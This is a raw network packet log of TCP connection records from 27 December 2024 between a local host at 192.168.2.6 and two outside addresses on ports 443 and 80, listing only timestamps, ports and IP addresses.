                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.695368052 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.695436001 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.695449114 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.695498943 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.702847958 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.702864885 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.702931881 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.702939034 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.703053951 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.711529016 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.711544991 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.711673975 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.711688995 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.711981058 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.721695900 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.721714973 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.721796036 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.721802950 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.721846104 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.725526094 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.725542068 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.968059063 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.968115091 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.968122005 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.968151093 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.968169928 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.086252928 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.086277008 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.086364985 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.086411953 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.086471081 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.088581085 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.088609934 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.088660002 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.088674068 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.088705063 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.088735104 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.096204996 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.096221924 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.096287966 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.096297979 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.096342087 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.098262072 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.098279953 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.098387957 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.098395109 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.098490000 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.104846001 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.104862928 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.104935884 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.104945898 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.104998112 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.107908964 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.107925892 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.108011007 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.108017921 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.108207941 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.114741087 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.114757061 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.114829063 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.114837885 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.114918947 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.116309881 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.116331100 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.116389990 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.116395950 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.116424084 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.116445065 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.124094009 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.124113083 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.124169111 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.124178886 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.124231100 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.124252081 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.126574039 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.126594067 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.126682043 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.126688004 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.126933098 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.133961916 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.133977890 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.134061098 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.134068966 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.134156942 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.134974957 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.134998083 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.135080099 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.135085106 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.135359049 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.143937111 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.143959999 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.144031048 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.144040108 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.144208908 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.144501925 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.144521952 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.144560099 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.144563913 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.144592047 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.144613028 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.152571917 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.152595043 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.152648926 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.152657032 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.152704000 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.868753910 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.868861914 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.868917942 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.909889936 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.960793018 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.981599092 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.981741905 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.984107018 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.985848904 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.985933065 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.988079071 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.994194031 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.994311094 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.996097088 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.002569914 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.002671957 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.004086018 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.007675886 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.007813931 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.008100986 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.012465954 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.012583017 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.015702963 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.017323971 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.017365932 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.019341946 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.022114992 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.022211075 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.024080038 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.026902914 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.027024984 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.028074980 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.031719923 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.031825066 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.032073021 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.036545038 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.036592960 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.040086985 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.041348934 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.041599989 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.044106007 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.046179056 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.046282053 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.046334028 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.050967932 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.051094055 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.052078962 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.055779934 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.055898905 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.055985928 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.060595036 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.060734034 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.064078093 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.065392971 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.065536976 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.065592051 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.070207119 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.070319891 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.070631981 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.075018883 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.075115919 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.076083899 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.173687935 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.173799992 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.173888922 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.175906897 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.176002026 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.176057100 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.180320024 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.180413008 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.180460930 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.185693979 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.185708046 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.185755014 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.188986063 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.189063072 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.189106941 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.193185091 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.193294048 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.193336964 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.197315931 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.197433949 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.197484016 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.201255083 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.408971071 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.409024954 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.411452055 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.411571980 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.411613941 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.413973093 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.414088011 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.414133072 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.416533947 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.416671038 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.416731119 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.419068098 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.419198990 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.419239998 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.421643019 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.421740055 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.421781063 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.424176931 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.424355030 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.424398899 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.426728010 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.426848888 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.426913977 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.429265976 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.429397106 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.429445028 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.431842089 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.431971073 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.432007074 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.434381008 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.434485912 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.434526920 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.436935902 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.437084913 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.437155962 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.439502954 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.439603090 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.439647913 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.442045927 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.442145109 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.442203999 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.444605112 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.444708109 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.444760084 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.447170019 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.447489023 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.447557926 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.449724913 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.449831009 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.449877977 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.452303886 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.452382088 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.452430964 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.454833984 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.454933882 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.454979897 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.457376957 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.457484007 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.457530975 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.459968090 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.460067987 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.460110903 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.462487936 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.462591887 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.462642908 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.465025902 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.465159893 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.465202093 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.467566013 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.467658043 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.467701912 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.470140934 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.470254898 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.470299959 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.472745895 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.472862959 CET80497735.252.155.64192.168.2.6
